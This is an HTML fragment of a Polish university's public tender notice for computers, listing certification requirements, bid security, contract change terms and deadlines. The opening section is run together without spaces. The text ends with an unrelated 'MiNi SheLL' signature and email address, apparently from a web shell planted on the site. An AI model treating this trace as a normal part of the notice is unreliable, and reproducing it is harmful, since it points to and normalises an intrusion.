serwisowych(c.ISO9001);Z.TYPB:C.ISO9001dla producentasprzętu,Dek.CE;Urządzeniawyprodukowanesąprzezproducenta,zgodnieznormąPN-ENISO50001;C.TCO,wymaganacertyfikacjanastronie: http://tcocertified.com/product-finder/załączyćdo ofertywydruk zestrony lub certyfikat;Potwierdzeniespełnieniakryteriów środowiskowych,wtymzgodnościzdyrektywąRoHSUE oeliminacji substancjiniebezpiecznych wpostacioświadczeniaproducentajednostki;F. serwisującamusi posiadaćISO9001naświadczenieusługserwisowychorazposiadać autoryzacjeproducenta urządzeń (certyfikatISO 9001);Wymaganedołączeniedo ofertyoświadczenia Producentapotwierdzając,żeSerwisurządzeńbędzierealizowany bezpośrednioprzezProducentai/lubwewspółpracy zAutoryzowanymPartneremSerwisowymProducenta;Oferowanemodelekomputerówmusząpoprawnie współpracowaćzzamawianymisystemamioperacyjnymi Wykonawcazałączydoofertywydrukzestronypotwierdzającykompatybilność komputeranadanaplatformęsystemową;doofertynależydołączyćlinkstronypotwierdzającydostępdonajnowszychsterownikówiuaktualnieńnastronieproducentazestawurealizowanypoprzezpodanienadedykowanejstronieinternetowejproducentanumeruseryjnegolubmodelukomputera;Z.TYPC:C.ISO9001dlaproducentasprzętu;Dek.CE(doofertynależyzałączyćdeklarację);Urządzeniawyprodukowaneprzezproducenta,zgodnieznormąPN-ENISO50001(certyfikat);C.TCOdlakomputerawymaganacertyfikacjanastronie:http://tcocertified.com/product-finder/wydrukzestronylubcertyfikat;ZgodnośćzdyrektywąRoHSUEoeliminacjisubstancjiniebezpiecznych(oświadczenieproducentalubWykonawcy);CISO9001naświadczenieusługserwisowych dlaf.świadczącejserwisgwarancyjny(c.ISO9001);OświadczenieProducentapotwierdzając,żeSerwisurządzeńbędzie realizowanybezpośrednioprzezProducentai/lubweMwspółpracyzAutoryzowanymPartneremSerwisowymProducenta;Potwierdzeniekompatybilnościkomputerazoferowanymsystememoperacyjnymwydrukzestrony lubcertyfikat; <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> Wraz z Ofertą Wykonawca zobowiązany jest złożyć za pośrednictwem Platformy: <br/>1) wypełniony opis przedmiotu zamówienia, który jest integralna częścią formularzy Oferty stanowiący załącznik:<br/>-1.1doSWZ – dot. części 1<br/>-1.2 do SWZ – dot. części 2 <br/>-1.3 do SWZ – dot. części 3 <br/>3)Oświadczenie o niepodleganiu wykluczeniu oraz spełnianiu warunków udziału w postępowaniu w zakresie wskazanym przez Zamawiającego (zał. nr 5 do SWZ):<br/>4)pełnomocnictwo upoważniające do złożenia oferty, o ile ofertę składa pełnomocnik;<br/>5)pełnomocnictwo do reprezentowania wszystkich Wykonawców wspólnie ubiegających się o udzielenie zamówienia lub inny dokument potwierdzający umocowanie do reprezentowania Wykonawcy (np. umowa o współdziałaniu). Pełnomocnik może być ustanowiony do reprezentowania Wykonawców w postępowaniu albo do reprezentowania w postępowaniu i zawarcia umowy, o ile ofertę składają Wykonawcy wspólnie ubiegający się o zamówienia; <br/>6)zobowiązanie podmiotu udostępniającego zasoby do oddania mu do dyspozycji niezbędnych zasobów na potrzeby realizacji danego zamówienia lub inny podmiotowy środek dowodowy potwierdzający, że wykonawca realizując zamówienie, będzie dysponował niezbędnymi zasobami tych podmiotów, o ile ofertę składa Wykonawca, który polega na zdolnościach lub sytuacji podmiotów udostępniających zasoby.<br/>7)6dokumenty, oświadczenia lub podmiotowe środki dowodowe składane wraz z ofertą – określone w rozdz. VI SWZ<br/>8)oryginał gwarancji lub poręczenia, jeśli wadium wnoszone jest w innej formie niż pieniądzu. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1.1.	Przystępując do procedury przetargowej Wykonawca jest obowiązany w terminie składania ofert, określonym w rozdz. XI ust 1, wnieść wadium na cały wymagany okres związania ofertą, w kwocie określonej dla oferowanego przez Wykonawcę części zamówienia: część 1 zamówienia 1400,00 zł; część 2 zamówienia 4500,00 zł; część 3 zamówienia: 600,00 zł.<br/>Więcej informacji zawiera rozdz. IV SWZ <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia zgodnie z art.58 ustawy Pzp: - wykazanie spełnienia warunków udziału, o których mowa w art. 112 ust. 2ustawy Pzp następuje łącznie; - wykazanie braku podstaw do wykluczenia z postępowania o udzielenie zamówienia następuje przez każdego z Wykonawców oddzielnie. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia ustanawiają pełnomocnika do reprezentowania ich w postępowaniu o udzielenie zamówienia albo reprezentowania w postępowaniu i zawarcia umowy w sprawie zamówienia publicznego (art. 58 ust. 2 ustawy<br/>Pzp). <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Oprócz zmian niniejszej umowy, możliwych do dokonania w oparciu o art. 455 ust. 1 i 2 ustawy Pzp, Zamawiający przewiduje możliwość zmiany postanowień zawartej umowy w następujących przypadkach:<br/>1) konieczności zrealizowania przedmiotu umowy przy zastosowaniu innych rozwiązań technicznych lub materiałowych ze względu na zmiany obowiązującego prawa lub wytyczne wydane przez uprawniony organ, a zmiana ta polega na dostosowaniu treści umowy do zmienionych wytycznych lub zmienionych przepisów prawa; <br/>2) zmiany sprzętu lub wyposażenia składającego się na przedmiot umowy na sprzęt lub wyposażenie składające się na przedmiot umowy o parametrach nie gorszych niż określone przez Zamawiającego i spełniające minimalne wymagania Zamawiającego określone w SWZ, o ile zmiana taka nie będzie wiązać się ze wzrostem wynagrodzenia dla Wykonawcy, a zmiana wynika z powodu zmiany parametrów technicznych lub funkcjonalnych sprzętu lub wyposażenia składającego się na przedmiot umowy, wprowadzonych przez producenta po terminie składania ofert, wycofania sprzętu lub wyposażenia składającego się na przedmiot umowy, ze sprzedaży, zaprzestania jego produkcji lub dystrybucji lub w przypadku upadłości producenta; <br/>3) zmiany przepisów prawa powszechnie obowiązującego, jeśli zmiana ta wpływa na zakres lub warunki wykonania przez strony świadczeń wynikających z umowy, a zmiana ta polega na dostosowaniu jej postanowień do zmienionych przepisów i realizacji celu umowy; <br/>4) gdy nastąpi zmiana powszechnie obowiązujących przepisów prawa w zakresie mającym wpływ na realizację umowy, w tym zmiana stawki podatku od towarów i usług; Wykonawca będzie zobowiązany do wystawienia faktury uwzględniającej zmianę podatku za dostawy realizowane po wejściu w życiu przepisów wprowadzających zmianę. Wartość netto wynagrodzenia należnego Wykonawcy z tytułu realizacji tych usług nie zmieni się, a wartość brutto zostanie wyliczona na podstawie nowych przepisów; <br/>5) przedłużenia terminu wykonania zamówienia w przypadku wystąpienia okoliczności, za które nie odpowiada Wykonawca, maksymalnie o 7 dni.<br/>6) zaistnienia siły wyższej lub sytuacji epidemicznej uniemożliwiającej wykonanie przedmiotu umowy w terminie określonym w § 3 ust. 1 umowy – dopuszcza się możliwość zmiany terminu wykonania przedmiotu umowy poprzez jego wydłużenie o czas odpowiadający czasowi występowania siły wyższej lub niekorzystnych okoliczności wynikających z sytuacji epidemicznej,<br/>nie dłużej niż o termin określony w § 3 ust. 1 umowy zaokrąglając do pełnego dnia w górę;<br/>7) konieczności zawieszenia wykonywania przedmiotu umowy z przyczyn leżących po stronie Zamawiającego - dopuszcza się zmianę terminu wykonania przedmiotu umowy określonego w § 3 ust. 1;<br/>8)wystąpienia w toku realizacji przedmiotu umowy niemożliwych do przewidzenia okoliczności nadzwyczajnych, niezależnych od Wykonawcy, skutkujących koniecznością wstrzymania realizacji przedmiotu umowy, dopuszcza się zmianę terminu wykonania przedmiotu umowy określonego w § 3 ust. 1 umowy nie dłużej niż o termin określony w § 3 ust. 1 umowy zaokrąglając do pełnego dnia w górę; <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2022-01-20 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://upzzamosc.ezamawiajacy.pl/servlet/HomeServlet</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2022-01-20 10:30</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA IX – POZOSTAŁE INFORMACJE</h2> Część 1 zamówienia: nie dłuższy niż 90 dni kalendarzowych licząc od dnia podpisania umowy.<br/>Część 2-3 zamówienia: nie dłuższy niż 90 dni kalendarzowych. Termin realizacji liczony będzie od dnia przekazania Wykonawcy stosowanego zamówienia potwierdzonego przez Ministerstwa Nauki i Szkolnictwa Wyższego, o którym mowa w par. 83 ust. 14 pkt 1 ustawy o podatku od towarów i usług ( Dz. U. z 2018r. poz. 2174,2174,2193,2215,2244,2354,2392 i 2433) , na okoliczność zastosowania stawki 0% VAT – zgodnie z § 3 projektu umowy.

Creat By MiNi SheLL
Email: jattceo@gmail.com